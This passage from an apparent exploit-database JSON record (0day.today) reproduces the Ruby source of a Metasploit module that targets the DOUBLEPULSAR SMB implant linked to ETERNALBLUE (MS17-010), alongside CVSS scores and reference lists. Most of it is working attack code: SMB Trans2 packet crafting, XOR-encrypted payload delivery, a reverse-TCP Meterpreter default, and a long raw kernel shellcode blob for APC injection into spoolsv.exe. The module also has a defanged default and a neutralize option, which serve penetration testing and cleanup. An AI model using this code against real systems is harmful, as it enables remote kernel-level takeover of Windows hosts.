data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-03] #"}, "lastseen": "2021-11-02T22:13:12", "differentElements": ["sourceData"], "edition": 64}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "3ca4aa9fd6d108d756212ae8b89dc5b1", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-03T22:14:11", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": 
["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-02T22:13:12", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-11-02T22:13:12", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: 
https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n 